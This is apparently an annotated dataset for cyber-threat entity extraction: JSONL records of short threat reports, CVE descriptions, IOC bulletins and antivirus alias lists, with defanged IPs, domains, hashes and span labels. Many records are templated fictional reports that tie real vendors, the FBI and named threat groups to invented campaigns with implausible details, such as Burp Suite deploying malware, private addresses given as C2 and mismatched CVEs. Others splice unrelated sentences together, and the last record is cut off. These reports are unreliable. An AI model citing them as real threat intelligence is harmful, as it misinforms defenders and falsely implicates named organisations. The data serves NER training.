{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Mythic artifacts at C:\\Windows\\System32\\runtime.dll. Memory dump analysis confirmed execution of Covenant. Registry modifications pointed to persistence via /opt/app/bin/sam.hive. Network forensics identified connections to 24[.]69[.]175[.]63 and syncsync[.]io. Email headers traced the initial vector to confirm@auth-check[ . ]org. File C:\\Users\\admin\\Desktop\\winlogon.exe (SHA256: b86e29372fdc04cd8ef14e6b2160d1838f222c2b1948bc4ce94095a243a58a6b) was identified as the initial dropper. A staging URL hxxps://edgeproxy[ . ]link/wp-content/uploads/doc.php resolved to 184 [ . ] 24 [ . ] 16 [ . ] 202. Secondary artifact hash: SHA1: b05554c70364f2f60a798729b13872fe29f2ce54.", "spans": {"Indicator: 24.69.175.63": [[296, 314]], "Indicator: syncsync.io": [[319, 332]], "Indicator: confirm@auth-check.org": [[377, 403]], "Indicator: b86e29372fdc04cd8ef14e6b2160d1838f222c2b1948bc4ce94095a243a58a6b": [[455, 519]], "Indicator: https://edgeproxy.link/wp-content/uploads/doc.php": [[574, 627]], "Indicator: 184.24.16.202": [[640, 671]], "Indicator: b05554c70364f2f60a798729b13872fe29f2ce54": [[704, 744]]}, "info": {"id": "synth_v2_01198", "source": "defanged_augment"}}
{"text": "sigstore framework is a common go library shared across sigstore services and clients. In versions 1.10.3 and below, the legacy TUF client (pkg/tuf/client.go) supports caching target files to disk. It constructs a filesystem path by joining a cache base directory with a target name sourced from signed target metadata; however, it does not validate that the resulting path stays within the cache base directory. A malicious TUF repository can trigger arbitrary file overwriting, limited to the permissions that the calling process has. Note that this should only affect clients that are directly using the TUF client in sigstore/sigstore or are using an older version of Cosign. Public Sigstore deployment users are unaffected, as TUF metadata is validated by a quorum of trusted collaborators. This issue has been fixed in version 1.10.4. As a workaround, users can disable disk caching for the legacy client by setting SIGSTORE_NO_CACHE=true in the environment, migrate to hxxps://github[ . ]com/sigstore/sigstore-go/tree/main/pkg/tuf, or upgrade to the latest sigstore/sigstore release.", "spans": {"Indicator: https://github.com/sigstore/sigstore-go/tree/main/pkg/tuf,": [[976, 1038]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-24137"}}
{"text": "Artifact Analysis for Raccoon Stealer campaign:\nStage 1 dropper at /usr/local/bin/update.dll - SHA256: 17db5279b4a743ca3329249ca51ff781b4c431cd99315ceb658244eafd81d99e\nStage 2 loader at /var/tmp/implant.so - MD5: e22d329db3c4b612314db72e9de4b37e\nFinal payload at C:\\Windows\\Tasks\\payload.bin - SHA1: f18e6118efac43cfa7fd3476b4d0e5367af10849\nExfiltration module - SHA256: 23807456de6f7fa6220c0f0ac155c3545c775e332318f125bdc2e41e04407f7e\nAll stages communicated with 73 [ . ] 176 [ . ] 225 [ . ] 108. PowerShell Empire signatures detected in Stage 2.", "spans": {"Malware: Raccoon Stealer": [[22, 37]], "Indicator: 17db5279b4a743ca3329249ca51ff781b4c431cd99315ceb658244eafd81d99e": [[103, 167]], "Indicator: e22d329db3c4b612314db72e9de4b37e": [[213, 245]], "Indicator: f18e6118efac43cfa7fd3476b4d0e5367af10849": [[300, 340]], "Indicator: 23807456de6f7fa6220c0f0ac155c3545c775e332318f125bdc2e41e04407f7e": [[371, 435]], "Indicator: 73.176.225.108": [[465, 497]]}, "info": {"id": "synth_v2_01863", "source": "defanged_augment"}}
{"text": "Artifact Analysis for DarkSide campaign:\nStage 1 dropper at C:\\Users\\admin\\Downloads\\helper.sh - MD5: ea1b5f3afbad94ab343ba9eaa0be235a\nStage 2 loader at /etc/cron.d/dropper.ps1 - SHA1: eaf10105057a10d9bcea0bfc26a1ef3ed2b4ea78\nFinal payload at /etc/cron.d/winlogon.exe - MD5: 4be786c4dc2cc636ff77d9a670aa8a9e\nExfiltration module - MD5: bc8146ba403fd8a74e0cf77927a62354\nAll stages communicated with 10[.]57[.]186[.]174. Mimikatz signatures detected in Stage 2.", "spans": {"Malware: DarkSide": [[22, 30]], "Indicator: ea1b5f3afbad94ab343ba9eaa0be235a": [[102, 134]], "Indicator: eaf10105057a10d9bcea0bfc26a1ef3ed2b4ea78": [[185, 225]], "Indicator: 4be786c4dc2cc636ff77d9a670aa8a9e": [[275, 307]], "Indicator: bc8146ba403fd8a74e0cf77927a62354": [[335, 367]], "Indicator: 10.57.186.174": [[397, 416]]}, "info": {"id": "synth_v2_01887", "source": "defanged_augment"}}
{"text": "Huntress published a threat intelligence report linking Gamaredon to a new campaign exploiting CVE-2020-16717 in Apache Struts. The attackers deployed StealC via Burp Suite, establishing C2 communication with 192 [ . ] 96 [ . ] 200 [ . ] 76 and proxy-static[ . ]net. A secondary payload was downloaded from hxxp://mail-storage[ . ]org/collect. The malware binary (MD5: 9b24d6c623acf64374b974b426d0448d) was dropped to /etc/cron.d/dropper.ps1. Phishing emails were sent from security@credential-check[.]site targeting enterprise users. A backup C2 server was identified at 10 [ . ] 253 [ . ] 197 [ . ] 29.", "spans": {"Organization: Huntress": [[0, 8]], "Vulnerability: CVE-2020-16717": [[95, 109]], "System: Apache Struts": [[113, 126]], "Malware: StealC": [[151, 157]], "Indicator: 192.96.200.76": [[209, 240]], "Indicator: proxy-static.net": [[245, 265]], "Indicator: http://mail-storage.org/collect": [[307, 342]], "Indicator: 9b24d6c623acf64374b974b426d0448d": [[369, 401]], "Indicator: security@credential-check.site": [[474, 506]], "Indicator: 10.253.197.29": [[572, 603]]}, "info": {"id": "synth_v2_00103", "source": "defanged_augment"}}
{"text": "r1-r4 : This is a local privilege escalation ( root ) exploit , which includes : CVE-2013-6282 , camerageroot ( http : //www[ . ]77169[ . ]org/exploits/2013/20130414031700 ) , a rooting tool for mtk6592 and addtional exploit . In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . DragonOK appears to operate out of China 's Jiangsu Province .", "spans": {"Vulnerability: CVE-2013-6282": [[81, 94]], "Vulnerability: zero-day exploits": [[264, 281], [516, 533], [585, 602]], "Indicator: www.77169.org": [[121, 142]]}, "info": {"id": "cyberner_stix_train_004454", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Royal Campaign:\nNetwork Indicators:\n- 10 [ . ] 69 [ . ] 98 [ . ] 177\n- 10[.]42[.]105[.]94\n- 172[.]161[.]172[.]192\n- relay-update[ . ]org\n- syncupdate[ . ]site\nURLs:\n- hxxps://portal-relay[.]info/secure/token\n- hxxp://backup-backup[.]live/callback\nEmail Senders:\n- security@secure-verify[.]net\n- contact@mail-service[ . ]info\nFile Indicators:\n- SHA256: fc62c55f7ad83e2f5b06a2cc3682f846045ded0a0f8bd5f5f4de5d4925eae59d\n- MD5: 3d3e964f0cd79892221cddf1a11bdc0a\n- Drop path: /var/tmp/backdoor.elf", "spans": {"Malware: Royal": [[15, 20]], "Indicator: 10.69.98.177": [[53, 83]], "Indicator: 10.42.105.94": [[86, 104]], "Indicator: 172.161.172.192": [[107, 128]], "Indicator: relay-update.org": [[131, 151]], "Indicator: syncupdate.site": [[154, 173]], "Indicator: hxxps://portal-relay.info/secure/token": [[182, 222]], "Indicator: http://backup-backup.live/callback": [[225, 261]], "Indicator: security@secure-verify.net": [[279, 307]], "Indicator: contact@mail-service.info": [[310, 339]], "Indicator: fc62c55f7ad83e2f5b06a2cc3682f846045ded0a0f8bd5f5f4de5d4925eae59d": [[367, 431]], "Indicator: 3d3e964f0cd79892221cddf1a11bdc0a": [[439, 471]]}, "info": {"id": "synth_v2_01458", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Conti Campaign:\nNetwork Indicators:\n- 219[.]86[.]211[.]83\n- 10[.]61[.]83[.]211\n- 10[.]230[.]154[.]228\n- login-cdn[.]cc\n- backupgateway[ . ]cc\nURLs:\n- hxxps://portalmail[ . ]cc/panel/index.html\n- hxxp://edge-login[ . ]online/collect\nEmail Senders:\n- alert@login-portal[.]tech\n- service@credential-check[.]site\nFile Indicators:\n- SHA1: 0a20dfe27d403aac12a96c9771d20007e7523f32\n- SHA1: 283e083c89cab46de63576a9e3406199eec989ed\n- Drop path: /opt/app/bin/implant.so", "spans": {"Malware: Conti": [[15, 20]], "Indicator: 219.86.211.83": [[53, 72]], "Indicator: 10.61.83.211": [[75, 93]], "Indicator: 10.230.154.228": [[96, 116]], "Indicator: login-cdn.cc": [[119, 133]], "Indicator: backupgateway.cc": [[136, 156]], "Indicator: https://portalmail.cc/panel/index.html": [[165, 207]], "Indicator: hxxp://edge-login.online/collect": [[210, 246]], "Indicator: alert@login-portal.tech": [[264, 289]], "Indicator: service@credential-check.site": [[292, 323]], "Indicator: 0a20dfe27d403aac12a96c9771d20007e7523f32": [[349, 389]], "Indicator: 283e083c89cab46de63576a9e3406199eec989ed": [[398, 438]]}, "info": {"id": "synth_v2_01384", "source": "defanged_augment"}}
{"text": "Malicious Instagram account : https : //www[ . ]instagram[ . ]com/freedomguidepeople1830/ Malicious Tumblr accounts : https : //mainsheetgyam[ . ]tumblr[ . ]com/ https : //hormonaljgrj[ . ]tumblr[ . ]com/ https : //globalanab[ . ]tumblr[ . ]com/ C & C addresses : 104 [ .", "spans": {"Organization: Instagram": [[10, 19]], "Organization: Tumblr": [[100, 106]], "Indicator: www.instagram.com": [[40, 65]], "Indicator: mainsheetgyam.tumblr.com": [[128, 160]], "Indicator: hormonaljgrj.tumblr.com": [[172, 203]], "Indicator: globalanab.tumblr.com": [[215, 244]]}, "info": {"id": "cyner_train_000125", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcutorture: Fix ksoftirqd boosting timing and iteration\n\nThe RCU priority boosting can fail in two situations:\n\n1) If (nr_cpus= > maxcpus=), which means if the total number of CPUs\nis higher than those brought online at boot, then torture_onoff() may\nlater bring up CPUs that weren't online on boot. Now since rcutorture\ninitialization only boosts the ksoftirqds of the CPUs that have been\nset online on boot, the CPUs later set online by torture_onoff won't\nbenefit from the boost, making RCU priority boosting fail.\n\n2) The ksoftirqd kthreads are boosted after the creation of\nrcu_torture_boost() kthreads, which opens a window large enough for these\nrcu_torture_boost() kthreads to wait (despite running at FIFO priority)\nfor ksoftirqds that are still running at SCHED_NORMAL priority.\n\nThe issues can trigger for example with:\n\n\t./kvm.sh --configs TREE01 --kconfig \"CONFIG_RCU_BOOST=y\"\n\n\t[   34.968561] rcu-torture: !!!\n\t[   34.968627] ------------[ cut here ]------------\n\t[   35.014054] WARNING: CPU: 4 PID: 114 at kernel/rcu/rcutorture.c:1979 rcu_torture_stats_print+0x5ad/0x610\n\t[   35.052043] Modules linked in:\n\t[   35.069138] CPU: 4 PID: 114 Comm: rcu_torture_sta Not tainted 5.18.0-rc1 #1\n\t[   35.096424] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[.]14[.]0-0-g155821a-rebuilt[.]opensuse[.]org 04/01/2014\n\t[   35.154570] RIP: 0010:rcu_torture_stats_print+0x5ad/0x610\n\t[   35.198527] Code: 63 1b 02 00 74 02 0f 0b 48 83 3d 35 63 1b 02 00 74 02 0f 0b 48 83 3d 21 63 1b 02 00 74 02 0f 0b 48 83 3d 0d 63 1b 02 00 74 02 <0f> 0b 83 eb 01 0f 8e ba fc ff ff 0f 0b e9 b3 fc ff f82\n\t[   37.251049] RSP: 0000:ffffa92a0050bdf8 EFLAGS: 00010202\n\t[   37.277320] rcu: De-offloading 8\n\t[   37.290367] RAX: 0000000000000000 RBX: 0000000000000001 RCX: 0000000000000001\n\t[   37.290387] RDX: 0000000000000000 RSI: 00000000ffffbfff RDI: 00000000ffffffff\n\t[   37.290398] RBP: 000000000000007b R08: 0000000000000000 R09: c0000000ffffbfff\n\t[   37.290407] R10: 000000000000002a R11: ffffa92a0050bc18 R12: ffffa92a0050be20\n\t[   37.290417] R13: ffffa92a0050be78 R14: 0000000000000000 R15: 000000000001bea0\n\t[   37.290427] FS:  0000000000000000(0000) GS:ffff96045eb00000(0000) knlGS:0000000000000000\n\t[   37.290448] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n\t[   37.290460] CR2: 0000000000000000 CR3: 000000001dc0c000 CR4: 00000000000006e0\n\t[   37.290470] Call Trace:\n\t[   37.295049]  <TASK>\n\t[   37.295065]  ? preempt_count_add+0x63/0x90\n\t[   37.295095]  ? _raw_spin_lock_irqsave+0x12/0x40\n\t[   37.295125]  ? rcu_torture_stats_print+0x610/0x610\n\t[   37.295143]  rcu_torture_stats+0x29/0x70\n\t[   37.295160]  kthread+0xe3/0x110\n\t[   37.295176]  ? kthread_complete_and_exit+0x20/0x20\n\t[   37.295193]  ret_from_fork+0x22/0x30\n\t[   37.295218]  </TASK>\n\nFix this with boosting the ksoftirqds kthreads from the boosting\nhotplug callback itself and before the boosting kthreads are created.", "spans": {"Indicator: rel-1.14.0-0-g155821a-rebuilt.opensuse.org": [[1343, 1393]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1301, 1305]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50177"}}
{"text": "Phishing Campaign Report: Check Point Research identified a large-scale phishing operation. Emails originated from finance@document-share[.]link and updates@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxp://secure-sync[ . ]cc/callback which hosted a credential harvesting page on datagateway[ . ]link. A secondary link hxxps://sync-secure[ . ]club/assets/js/payload.js delivered ShadowPad (SHA1: 699f3b0ef61a6ca7500802942deb399f836b4292). The malware was saved to /dev/shm/helper.sh and established C2 with 170[.]184[.]90[.]160.", "spans": {"Organization: Check Point Research": [[26, 46]], "Indicator: finance@document-share.link": [[115, 144]], "Indicator: updates@identity-verify.cc": [[149, 179]], "Indicator: http://secure-sync.cc/callback": [[236, 270]], "Indicator: datagateway.link": [[316, 336]], "Indicator: hxxps://sync-secure.club/assets/js/payload.js": [[355, 404]], "Malware: ShadowPad": [[415, 424]], "Indicator: 699f3b0ef61a6ca7500802942deb399f836b4292": [[432, 472]], "Indicator: 170.184.90.160": [[543, 563]]}, "info": {"id": "synth_v2_01042", "source": "defanged_augment"}}
{"text": "A backdoor also known as: HW32.Packed.4904 Trojan[.]Clicker[.]Delf[.]CN Trojan[.]Clicker[.]Delf[.]CN Trojan/Clicker[.]Delf[.]cn Trojan.Win32.Delf.ifph Trojan.Adclicker TROJ_ADCLICKE.AS Trojan-Clicker[ . ]Win32[ . ]Delf[ . ]cn Trojan.CL.Delf!GHMyZMRoBZw Trojan.Win32.Clicker.197194[h] Troj[ . ]Clicker[ . ]W32[ . ]Delf[ . ]cn!c Virus.Win32.Heur.e Trojan[.]Clicker[.]Delf[.]CN Backdoor.Win32.Popwin.~IQ Trojan[ . ]Clicker[ . ]Delf[ . ]CN Trojan.Dasist Trojan.Delf.Win32.8103 TROJ_ADCLICKE.AS BehavesLike[ . ]Win32[ . ]PWSZbot[ . ]cc Trojan/Delf.ab TR/Click[ . ]Delf[ . ]CN.5 Trojan[Clicker]/Win32.Delf Trojan[.]Clicker[.]Delf[.]CN Win-Trojan/Xema.variant Trojan:Win32/Adcliker.K TrojanClicker.Delf Win32.Trojan.Delf.Lhxa Trojan[ . ]Clicker[ . ]Delf[ . ]CN Clicker.CSA", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.Clicker.Delf.CN": [[43, 71], [72, 100], [346, 374], [401, 435], [600, 628], [719, 753]], "Indicator: Clicker.Delf.cn": [[108, 127]], "Indicator: Trojan-Clicker.Win32.Delf.cn": [[185, 225]], "Indicator: Troj.Clicker.W32.Delf.cn": [[284, 324]], "Indicator: BehavesLike.Win32.PWSZbot.cc": [[490, 530]], "Indicator: Click.Delf.CN": [[549, 570]]}, "info": {"id": "cyner2_train_001027", "source": "defanged_augment"}}
{"text": "220 [ . ] 158 [ . ] 216 [ . ] 127 to gather additional Zebrocy samples as well as a weaponized document .", "spans": {"Indicator: 220.158.216.127": [[0, 33]], "Malware: Zebrocy": [[55, 62]]}, "info": {"id": "cyberner_stix_train_002217", "source": "defanged_augment"}}
{"text": "FBI published a threat intelligence report linking APT28 to a new campaign exploiting CVE-2020-11739 in Zyxel USG. The attackers deployed Cobalt Strike via PsExec, establishing C2 communication with 162[.]99[.]196[.]127 and gateway-data[.]org. A secondary payload was downloaded from hxxps://cdnedge[.]xyz/gate.php. The malware binary (SHA256: ba4a5d089e1f12fa709b2ca4abec7fece16ba33979137fb58c532948202e61a4) was dropped to C:\\Windows\\Tasks\\loader.exe. Phishing emails were sent from confirm@document-share[.]link targeting enterprise users. A backup C2 server was identified at 63 [ . ] 75 [ . ] 2 [ . ] 229.", "spans": {"Organization: FBI": [[0, 3]], "Vulnerability: CVE-2020-11739": [[86, 100]], "System: Zyxel USG": [[104, 113]], "Malware: Cobalt Strike": [[138, 151]], "Indicator: 162.99.196.127": [[199, 219]], "Indicator: gateway-data.org": [[224, 242]], "Indicator: hxxps://cdnedge.xyz/gate.php": [[284, 314]], "Indicator: ba4a5d089e1f12fa709b2ca4abec7fece16ba33979137fb58c532948202e61a4": [[344, 408]], "Indicator: confirm@document-share.link": [[485, 514]], "Indicator: 63.75.2.229": [[580, 609]]}, "info": {"id": "synth_v2_00013", "source": "defanged_augment"}}
{"text": "Vulnerability in the Database Filesystem component of Oracle Database Server. Supported versions that are affected are 11[.]2[.]0[.]4, 12 [ . ] 1 [ . ] 0 [ . ] 2 and 12[.]2[.]0[.]1. Easily exploitable vulnerability allows high privileged attacker having Resource, Create Table, Create View, Create Procedure, Dbfs_role privilege with network access via Oracle Net to compromise Database Filesystem. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Database Filesystem. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).", "spans": {"Indicator: 11.2.0.4": [[119, 133]], "Indicator: 12.1.0.2": [[135, 161]], "Indicator: 12.2.0.1": [[166, 180]], "System: Oracle Database": [[54, 69]], "Organization: Oracle": [[353, 359]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-14741"}}
{"text": "Enlarge / Top 20 countries targeted by Hummingbad/Shedun . Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus . APT33 : 8 [ . ] 26 [ . ] 21 [ . ] 223 [REDACTED][ . ]ddns[ . ]net . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": {"Malware: Hummingbad/Shedun": [[39, 56]], "Organization: governments": [[71, 82]], "Indicator: 8.26.21.223": [[280, 309]], "Indicator: [REDACTED].ddns.net": [[310, 337]], "Organization: Harrison": [[363, 371]]}, "info": {"id": "cyberner_stix_train_007725", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Trojan2.KJRE Infostealer.Bancos Win.Spyware.Banker-3740 Trojan.Win32.Banker.brismu Troj.Spy.W32.Delf.gmb!c Trojan.PWS.Spy.281 Trojan.Banker.Win32.115104 BehavesLike[.]Win32[.]Ramnit[.]cc W32/Trojan.FKOH-7228 TrojanSpy.Delf.efw W32.InfoStealer.Bancos Win32.Troj.Delf.kcloud Trojan/Win32.Xema.C140526 Trj/CI.A Win32.Trojan.Spy.Edyh TrojanSpy.Delf!R/OQYQsjYN8 Trojan-Spy.Win32.Bancos W32/DelpBanc.A!tr Win32/Trojan.Spy.1ee", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Ramnit.cc": [[226, 259]]}, "info": {"id": "cyner2_train_007001", "source": "defanged_augment"}}
{"text": "It seems , however , if the same victim has more than one device the malware can be reused since the IMEI is sent along with each data exfiltration . Further research led us to additional MoonWind samples using the same C2 ( dns[ . ]webswindows[ . ]com ) but hosted on a different compromised but legitimate website . The WATERSPOUT backdoor was written to the same file path as the HIGHTIDE backdoors : C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word[ . ]exe , C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\winword[.]exe . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": {"Malware: WATERSPOUT backdoor": [[322, 341]], "Malware: HIGHTIDE backdoors": [[383, 401]], "Indicator: SETTINGS\\Temp\\word.exe": [[443, 469]], "Indicator: SETTINGS\\Temp\\winword.exe": [[511, 538]], "Indicator: dns.webswindows.com": [[225, 252]]}, "info": {"id": "cyberner_stix_train_007787", "source": "defanged_augment"}}
{"text": "Blog Post by Zscaler ThreatLabz: Tracking Sandworm's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-16078 against F5 BIG-IP deployments. The initial access vector involves spear-phishing emails from it@secure-verify[.]net delivering Latrodectus. Post-compromise, the attackers deploy SystemBC and use Mimikatz for reconnaissance. C2 infrastructure includes 171 [ . ] 38 [ . ] 181 [ . ] 116 and gateway-node[.]tech. A staging server at hxxps://relay-cdn[.]tech/panel/index.html hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\svchost.exe (SHA256: bb4efe2e12bf7505f7f91edadc0d27aae5e82ba1d209eba49a4f548545869d2f).", "spans": {"Organization: Zscaler ThreatLabz": [[13, 31]], "Vulnerability: CVE-2021-16078": [[130, 144]], "System: F5 BIG-IP": [[153, 162]], "Indicator: it@secure-verify.net": [[238, 260]], "Malware: Latrodectus": [[272, 283]], "Malware: SystemBC": [[323, 331]], "Indicator: 171.38.181.116": [[396, 428]], "Indicator: gateway-node.tech": [[433, 452]], "Indicator: hxxps://relay-cdn.tech/panel/index.html": [[474, 515]], "Indicator: bb4efe2e12bf7505f7f91edadc0d27aae5e82ba1d209eba49a4f548545869d2f": [[603, 667]]}, "info": {"id": "synth_v2_01687", "source": "defanged_augment"}}
{"text": "Artifact Analysis for SmokeLoader campaign:\nStage 1 dropper at /var/tmp/winlogon.exe - SHA1: 4f6db7165f884312d44973e0072d5050fcbaf505\nStage 2 loader at /etc/cron.d/csrss.exe - MD5: fd7112457f6e909882ace31e6ec985c6\nFinal payload at /var/tmp/ntds.dit - SHA1: 80d42894a6606617525e69417293083428c479d2\nExfiltration module - SHA256: 9e1564490f28811b107cba26529800f7f9efa31dcfb79f09355441532ba396d4\nAll stages communicated with 163[.]229[.]191[.]196. Hashcat signatures detected in Stage 2.", "spans": {"Malware: SmokeLoader": [[22, 33]], "Indicator: 4f6db7165f884312d44973e0072d5050fcbaf505": [[93, 133]], "Indicator: fd7112457f6e909882ace31e6ec985c6": [[181, 213]], "Indicator: 80d42894a6606617525e69417293083428c479d2": [[257, 297]], "Indicator: 9e1564490f28811b107cba26529800f7f9efa31dcfb79f09355441532ba396d4": [[328, 392]], "Indicator: 163.229.191.196": [[422, 443]]}, "info": {"id": "synth_v2_01953", "source": "defanged_augment"}}
{"text": "testproj[.]exe dropped benign decoy files and started malicious executables .", "spans": {"Indicator: testproj.exe": [[0, 14]]}, "info": {"id": "cyberner_stix_train_001160", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: ESET Research identified a large-scale phishing operation. Emails originated from account@document-share[.]link and service@account-update[ . ]xyz, spoofing legitimate services. Victims were directed to hxxps://edgecloud[.]io/panel/index.html which hosted a credential harvesting page on proxy-portal[ . ]net. A secondary link hxxps://gatewaycloud[ . ]io/download/update.exe delivered LockBit (SHA1: 9e05889736c6a9d90ec384cd3906717ec7dee7aa). The malware was saved to C:\\Users\\admin\\Desktop\\taskhost.exe and established C2 with 10 [ . ] 14 [ . ] 170 [ . ] 189.", "spans": {"Organization: ESET Research": [[26, 39]], "Indicator: account@document-share.link": [[108, 137]], "Indicator: service@account-update.xyz": [[142, 172]], "Indicator: https://edgecloud.io/panel/index.html": [[229, 268]], "Indicator: proxy-portal.net": [[314, 334]], "Indicator: hxxps://gatewaycloud.io/download/update.exe": [[353, 400]], "Malware: LockBit": [[411, 418]], "Indicator: 9e05889736c6a9d90ec384cd3906717ec7dee7aa": [[426, 466]], "Indicator: 10.14.170.189": [[554, 585]]}, "info": {"id": "synth_v2_01021", "source": "defanged_augment"}}
{"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4[.]19[.]9[.]98 .", "spans": {"Malware: Carbanak": [[11, 19]], "Organization: banks": [[79, 84]], "Organization: payment systems": [[91, 106]], "Indicator: Cyberlink": [[158, 167]], "Indicator: 4.19.9.98": [[253, 268]]}, "info": {"id": "cyberner_stix_train_000295", "source": "defanged_augment"}}
{"text": "IOC Bulletin - RedLine Stealer Campaign:\nNetwork Indicators:\n- 202[.]150[.]67[.]92\n- 172[.]242[.]252[.]126\n- 65 [ . ] 146 [ . ] 140 [ . ] 145\n- synccache[ . ]xyz\n- backup-gateway[ . ]info\nURLs:\n- hxxp://updateportal[ . ]cc/callback\n- hxxp://edgegateway[ . ]org/secure/token\nEmail Senders:\n- it@login-portal[.]tech\n- verify@credential-check[.]site\nFile Indicators:\n- SHA256: 0a4aa16f727d7fa4c357f6ed7230738c723cae0bbfb91fa895f878e768cbdf40\n- SHA256: 308615cb4494e967db13a67299fe83f77b8a6dc4aa54c56b8d1d4f2d34155676\n- Drop path: /var/tmp/dropper.ps1", "spans": {"Malware: RedLine Stealer": [[15, 30]], "Indicator: 202.150.67.92": [[63, 82]], "Indicator: 172.242.252.126": [[85, 106]], "Indicator: 65.146.140.145": [[109, 141]], "Indicator: synccache.xyz": [[144, 161]], "Indicator: backup-gateway.info": [[164, 187]], "Indicator: hxxp://updateportal.cc/callback": [[196, 231]], "Indicator: http://edgegateway.org/secure/token": [[234, 273]], "Indicator: it@login-portal.tech": [[291, 313]], "Indicator: verify@credential-check.site": [[316, 346]], "Indicator: 0a4aa16f727d7fa4c357f6ed7230738c723cae0bbfb91fa895f878e768cbdf40": [[374, 438]], "Indicator: 308615cb4494e967db13a67299fe83f77b8a6dc4aa54c56b8d1d4f2d34155676": [[449, 513]]}, "info": {"id": "synth_v2_01403", "source": "defanged_augment"}}
{"text": "This indicates that multiple C2 servers were used in this campaign , but one ( 37 [ . ] 1 [ . ] 207 [ . ] 31 ) was the most heavily used . A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation . The malware is executed only for the following layout , the country is based on the Microsoft website : Cyberattacks can leave companies wondering how could this happen to us so , when these situations arise , it can help to know what might be motivating these attackers .", "spans": {"Organization: Microsoft": [[404, 413]], "Indicator: 37.1.207.31": [[79, 108]]}, "info": {"id": "cyberner_stix_train_002943", "source": "defanged_augment"}}
{"text": "We saw the following hardcoded C & C server location in the RAT package : Conclusion : The DroidJack RAT is another example of a growing trend in which malware authors seek to exploit public interest as a way to spread malware . The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 1[.]doc : 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 . Mandiant is not aware of any configuration change that can be made to force request logging for these endpoints .", "spans": {"Malware: DroidJack RAT": [[91, 104]], "Organization: financial services": [[310, 328]], "Organization: telecoms": [[331, 339]], "Organization: government": [[342, 352]], "Organization: defense sectors": [[359, 374]], "Indicator: 1.doc": [[377, 384]], "Indicator: 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8": [[387, 451]], "Organization: Mandiant": [[454, 462]]}, "info": {"id": "cyberner_stix_train_003065", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from admin@auth-check[ . ]org and admin@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://proxygateway[ . ]info/gate.php which hosted a credential harvesting page on storageauth[.]org. A secondary link hxxp://authstorage[.]online/panel/index.html delivered WarmCookie (SHA256: 6e2042e8e9c59ffc5b2fc6f8406432cf7d527458df6bcc7d7012e57ba90167e8). The malware was saved to C:\\Windows\\Tasks\\beacon.dll and established C2 with 207[.]50[.]68[.]60.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: admin@auth-check.org": [[103, 127]], "Indicator: admin@secure-verify.net": [[132, 159]], "Indicator: hxxp://proxygateway.info/gate.php": [[216, 253]], "Indicator: storageauth.org": [[299, 316]], "Indicator: hxxp://authstorage.online/panel/index.html": [[335, 379]], "Malware: WarmCookie": [[390, 400]], "Indicator: 6e2042e8e9c59ffc5b2fc6f8406432cf7d527458df6bcc7d7012e57ba90167e8": [[410, 474]], "Indicator: 207.50.68.60": [[554, 572]]}, "info": {"id": "synth_v2_00933", "source": "defanged_augment"}}
{"text": "Blog Post by Trend Micro: Tracking BlackTech's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2024-27359 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from verify@secure-verify[ . ]net delivering Conti. Post-compromise, the attackers deploy PlugX and use PsExec for reconnaissance. C2 infrastructure includes 73[.]16[.]165[.]187 and cache-data[.]info. A staging server at hxxp://securebackup[.]site/admin/config hosts additional tooling. Key artifact: C:\\Windows\\System32\\runtime.dll (SHA1: 0b462a466b69be91392bd2f0a7caa06e5145bb13).", "spans": {"Organization: Trend Micro": [[13, 24]], "Vulnerability: CVE-2024-27359": [[124, 138]], "System: Atlassian Confluence": [[147, 167]], "Indicator: verify@secure-verify.net": [[243, 271]], "Malware: Conti": [[283, 288]], "Malware: PlugX": [[328, 333]], "Indicator: 73.16.165.187": [[396, 415]], "Indicator: cache-data.info": [[420, 437]], "Indicator: hxxp://securebackup.site/admin/config": [[459, 498]], "Indicator: 